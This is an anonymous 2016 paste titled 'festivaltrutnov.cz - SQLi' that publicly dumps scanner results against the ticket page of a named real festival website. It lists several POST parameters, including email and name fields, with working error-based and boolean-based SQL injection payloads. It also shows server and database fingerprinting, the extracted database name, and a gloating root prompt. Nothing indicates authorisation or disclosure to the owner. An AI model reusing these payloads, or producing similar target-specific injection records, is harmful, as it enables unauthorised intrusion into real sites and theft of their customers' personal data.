festivaltrutnov.cz - SQLi

a guest
May 11th, 2016
=== SQL Injection

Severity : Critical
Vulnerable URL : http://festivaltrutnov.cz/vstupenky
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: akcecenikCZK
Parameter Type: Post
Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

=== Boolean Based SQL Injection

Severity : Critical
Vulnerable URL : http://festivaltrutnov.cz/vstupenky
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: akcecenikCZK
Parameter Type: Post
Attack Pattern: -1 OR 17-7=10

=== [High Possibility] SQL Injection

Severity : Critical
Vulnerable URL : http://festivaltrutnov.cz/vstupenky
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: akcecenikCZK
Parameter Type: Post
Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://festivaltrutnov.cz/vstupenky
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: cp
Parameter Type: Post
Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'

Severity : Critical
Vulnerable URL : http://festivaltrutnov.cz/vstupenky
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: email
Parameter Type: Post
Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Severity : Critical
Vulnerable URL : http://festivaltrutnov.cz/vstupenky
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: jmeno
Parameter Type: Post
Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Severity : Critical
Vulnerable URL : http://festivaltrutnov.cz/vstupenky
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: mesto
Parameter Type: Post
Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'


Analyzing http://festivaltrutnov.cz/vstupenky with 10 input parameter(s)
Test parameter: stat
Host IP: 127.0.0.1 (Proxy IP)
Web Server: Apache/2.2.22 (Debian)
Powered-by: PHP/5.4.45-0+deb7u2
DB Server: MySQL

Current DB: festivaltrutnovcz

root@subgraph:~# :)